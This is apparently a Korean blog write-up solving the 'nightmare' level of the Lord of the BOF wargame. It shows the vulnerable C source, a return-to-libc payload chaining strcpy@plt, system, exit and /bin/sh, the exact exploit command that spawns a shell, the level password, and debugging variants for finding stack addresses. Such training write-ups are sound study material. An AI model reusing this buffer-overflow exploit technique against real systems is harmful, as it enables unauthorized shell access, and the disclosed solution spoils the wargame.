(LOB)level18.succubus

상대적으로 금방풀었네요 

[succubus@localhost succubus]$ cat nightmare.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - nightmare

        - PLT

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <dumpcode.h>

main(int argc, char *argv[])

{

char buffer[40];

char *addr;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// check address

addr = (char *)&strcpy;

        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with strcpy()\n");

                exit(0);

        }

        // overflow!

        strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// dangerous waterfall

memset(buffer+40+8, 'A', 4);

}

소스에서 ret에 strcpy@plt 를 넣는거로 봐서 rtl로 접근해야겟다 생각했습니다 

[payload]

argv[1] 

buf40 |SFP | &strcpy@plt | dummy | dest(buf48) |source(argv[2])

argv[2] 

&system | &exit |&/bin/sh 

+)&system &exit  &/bin/sh &strcpy@plt 구하는건 누구나 다 할수 있으므로 생략

[attack]

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "a"x44,"\x10\x84\x04\x08","AAAA","\xa0\xfa\xff\xbf","\x32\xfc\xff\xbf"'` `perl -e 'print "\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\xf9\xbf\x0f\x40"'`

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?AAAA????

bash$ my-pass

euid = 518

beg for me

&buffer +48 이랑 &argv[2] 구하는데 소스를 추가해서 구햇는데 한가지 의문이남는 부분이 있습니다 

---------------------------------------------------------------------------------------------------

ex1)

[succubus@localhost /tmp]$ cat nightmare.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - nightmare

        - PLT

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <dumpcode.h>

main(int argc, char *argv[])

{

   char buffer[40];

   char *addr;

   if(argc < 2){

      printf("argv error\n");

      exit(0);

   }

   // check address

   addr = (char *)&strcpy;

        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with strcpy()\n");

                exit(0);

        }

        // overflow!

        strcpy(buffer, argv[1]);

   printf("%s\n", buffer);

   // dangerous waterfall

   memset(buffer+40+8, 'A', 4);

   printf("buffer Using : %x\n",buffer);

   printf("argv[2] Using : %x\n",argv[2]);

}

[succubus@localhost /tmp]$ ./nightmare `perl -e 'print "\x90"x44,"\x10\x84\x04\x08","aaaa","bbbb","cccc"'` `perl -e 'print "\xe0\x8a\x05\x40","\xe0\x91\x03\x40","\xf9\xbf\x0f\x40"'`

?????????????????????????????????????????????aaaabbbbcccc

buffer Using : bffffa70

Segmentation fault (core dumped)

~> argv[2]가 씹힘

---------------------------------------------------------------------------------------------------

---------------------------------------------------------------------------------------------------

ex2)

[succubus@localhost /tmp]$ cat nightmare.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - nightmare

        - PLT

*/

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <dumpcode.h>

main(int argc, char *argv[])

{

   char buffer[40];

   char *addr;

   if(argc < 2){

      printf("argv error\n");

      exit(0);

   }

   printf("argv[2] Using:%x\n",argv[2]);//여기다가 추가해봣음

   // check address

   addr = (char *)&strcpy;

        if(memcmp(argv[1]+44, &addr, 4) != 0){

                printf("You must fall in love with strcpy()\n");

                exit(0);

        }

        // overflow!

        strcpy(buffer, argv[1]);

   printf("%s\n", buffer);

   // dangerous waterfall

   memset(buffer+40+8, 'A', 4);

   printf("buffer Using:%x\n",buffer);

   printf("argv[2] Using:%x\n",argv[2]);

}

[succubus@localhost /tmp]$ ./nightmare `perl -e 'print "\x90"x44,"\x10\x84\x04\x08","aaaa","bbbb","cccc"'` `perl -e 'print "\x90"x12'`

argv[2] Using:bffffc32

?????????????????????????????????????????????aaaabbbbcccc

buffer Using:bffffa70

Segmentation fault (core dumped)

~> 나옴 

---------------------------------------------------------------------------------------------------

+)strcpy부분 떄문에 argv[]를 뽑아오면서 영향을 주기 때문에, 소스 뒷부분에 argv[2] 주소를 뽑아주는 소스를  추가해주면 씹히게 됨